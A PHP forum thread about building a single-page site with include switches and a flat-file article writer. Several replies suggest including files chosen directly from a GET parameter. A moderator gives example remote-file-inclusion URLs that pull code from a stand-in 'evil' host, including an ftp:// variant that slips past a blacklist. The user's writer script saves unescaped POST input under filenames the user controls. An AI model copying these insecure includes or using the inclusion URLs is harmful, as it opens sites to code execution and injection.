Extending a single page management script

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Mobius Man
Forum Newbie
Posts: 8
Joined: Mon Dec 15, 2003 8:16 pm

Extending a single page management script

Post by Mobius Man »

I've created a script (well, two different ones). The first one is for my index.php page, which is a simple include switch that keeps it to a single page design:

Code: Select all

<?php

ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
    case 'articles':
        include('articles.php');
        break;
    case 'contact':
        include('contact.php');
        break;
    case 'spotlight':
        include('spotlight.php');
        break;
    case 'fan':
        include('fan.php');
        break;
    case 'multimedia':
        include('multimedia.php');
        break;
    case 'links':
        include('links.php');
        break;
    case null:
        include('./news/news.txt');
        break;
    default:
        include('error.php');
        break;
}


?>

That works fine. Secondly, I have a script that when I want to create pages for these pages (i.e. index -> articles -> page), it makes links on the selected page (articles.php for example). This is ok as well. The problem is, how can I include these links on the page as I do with the index.php and those branch files.

Basically I want the index ->articles.php ->page linked from articles.php to all be a single-page deal.
McGruff
DevNet Master
Posts: 2893
Joined: Thu Jan 30, 2003 8:26 pm
Location: Glasgow, Scotland

Post by McGruff »

First, dynamic includes might be a better option than a switch / case - can be much quicker with many cases. You'd need to prefix file names for security if you are opening files based on values passed via GET:

Code: Select all

<?php

include('prefix_' . $_GET['page']);

?>
With the null & default cases:

Code: Select all

<?php

function loadPage()
{
    if(is_null($_GET['page']))
    {
        // include .. etc
        return;
    }
    if(!is_file('prefix_' . $_GET['page']))
    {
        // include .. etc
        return;
    }
    include('prefix_' . $_GET['page']);
}
?>
This requires strict file naming conventions, of course.

I couldn't quite understand your query: are you making a front controller? Some recent discussion on this here viewtopic.php?t=15107
Last edited by McGruff on Wed Aug 10, 2005 4:56 am, edited 1 time in total.
Mobius Man
Forum Newbie
Posts: 8
Joined: Mon Dec 15, 2003 8:16 pm

Post by Mobius Man »

Basically I'm trying to make a basic mangaer using flat files (I have no access to SQL). :(

This is the file that makes the links, and writes the information to the pages:

Code: Select all

<?php
include ("news/config.php");
$id = $_POST["id"];
$filename = $_POST["id"];
$date = date("F j, Y");
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$content = $_POST["content"];
$pass = $_POST["password"];

if ($password == $pass)
{

$dir = "/" ;
opendir($dir);

$filename2 = 'articles.php';


$file = file_get_contents($filename2);
$fp = fopen($filename2, "w");
fwrite($fp, "<a href=articles/$id>$title</a> - $date <br /><br />");
fwrite($fp, $file);
fclose($fp);

closedir($dir);

chdir("articles");

$file = file_get_contents($filename);
$fp = fopen($filename, "w");
fwrite($fp, "<h1>$title</h1> Posted by: <a href=mailto:$email>$name</a>  $date <br /><br /><br /><br /> $content</font> <br />");
fwrite($fp, $file);

fclose($fp);








?>
<html>
<head>
<title> Page Editor</title>
</head>
<body bgcolor="#6B859C">
<?php echo "<font face=$font size=$fontsize>";
      echo "<center><h2>SUCCESS!!</h2></center>";
      echo "<center>Your news has been successfully posted.<br />";
      echo "Go To: <a href=$websiteurl>$websitename</a> | <a href=page_create.php>Make Another Post</a></center></font>";


?>
</body>
</html>
<?php }
 else {
 echo "Wrong Password <a href=news.php>Try again</a>.";
}
?>
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

instead of:

Code: Select all

<?php 

ini_set('include_path', 'http://mobius_man.t35.com'); 
switch ($_GET&#1111;'page']) &#123; 
    case 'articles': 
        include('articles.php'); 
        break; 
    case 'contact': 
        include('contact.php'); 
        break; 
    case 'spotlight': 
        include('spotlight.php'); 
        break; 
    case 'fan': 
        include('fan.php'); 
        break; 
    case 'multimedia': 
        include('multimedia.php'); 
        break; 
    case 'links': 
        include('links.php'); 
        break; 
    case null: 
        include('./news/news.txt'); 
        break; 
    default: 
        include('error.php'); 
        break; 
&#125; 


?>
Do this:

Code: Select all

$file=$_GET&#1111;'page']
include "$file.php";
easier and safer.... I hope :roll:
User avatar
DuFF
Forum Contributor
Posts: 495
Joined: Tue Jun 24, 2003 7:49 pm
Location: USA

Post by DuFF »

basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory. Example:

http://mobius_man.t35.com/index.php?page=path/to/secret.php

Mobius Man, could you please explain what your problem is in more detail? I don't understand what you are having problems with.
qads
DevNet Resident
Posts: 1199
Joined: Tue Apr 23, 2002 10:02 am
Location: Brisbane

Post by qads »

you want to edit the files with php? :?
User avatar
vigge89
Forum Regular
Posts: 875
Joined: Wed Jul 30, 2003 3:29 am
Location: Sweden

Post by vigge89 »

you can use something like this:

Code: Select all

<?php

//Include content
if (isset($_GET['id'])) {
	$id = "".addslashes($_GET['id']).".php";
	if (file_exists($id)) {
		include ($id); //Include chosen page
	}
	else {
		include ("404.php"); //If the file requested does not exist
	}
}
else {
	include ("start.php"); //Default page
}


?>
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

Anyone could just use the URL query to bring up any PHP file in the directory
this can be handled with: sessions, referer trick etc :wink:
User avatar
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Post by Weirdan »

DuFF wrote:
basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory.
Even more, it could be used to include the script from remote host:

Code: Select all

http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
It will include(and execute) the script from http://evil.weirdan's.host.com/path/to/secret.php.
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?
User avatar
m3mn0n
PHP Evangelist
Posts: 3548
Joined: Tue Aug 13, 2002 3:35 pm
Location: Calgary, Canada

Post by m3mn0n »

lol There is nothing wrong with what he uses, I use the exact same thing. And on most servers I've tested the different page switchers, the difference in script execution is not even a hundredth of a second; so no biggie. And I prefer to define what pages are able to be called instead of allowing anything within a directory, based on the file name. Maybe he does too.

Regarding your article manager, what is wrong with what you're trying to do? And how can we help?
User avatar
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Post by Weirdan »

basdog22 wrote:
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?
it will. But then I'll change the url to:

Code: Select all

http://mobius_man.t35.com/index.php?page=ftp://evil.weirdan's.host.com/path/to/secret
;)
use [php_man]basename[/php_man] function to get rid of traversals and xss attacks.
Mobius Man
Forum Newbie
Posts: 8
Joined: Mon Dec 15, 2003 8:16 pm

Post by Mobius Man »

Wow! There's been a lot of posts since I was last on.

Basically, my problem is this. I want to include pages branching from a page off of index.php

For example:

index.php -> articles.php --- this works fine. However...


index.php -> articles.php -> a linked pages from articles.php ---

instead of being included on the same pages as articles.php, it goes directly to the file. I want everything to stay as it would in index.php.
User avatar
m3mn0n
PHP Evangelist
Posts: 3548
Joined: Tue Aug 13, 2002 3:35 pm
Location: Calgary, Canada

Post by m3mn0n »

?p=articles which requires articles.php; and within articles.php, you require an article be called from the GET method also. So the URL would be something like ?p=articles&id=2925.
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

weirdan :wink: :wink:

Thanks :D basename rules 8)


i will use it for another script i am working on. you can really play with this one :wink:
Post Reply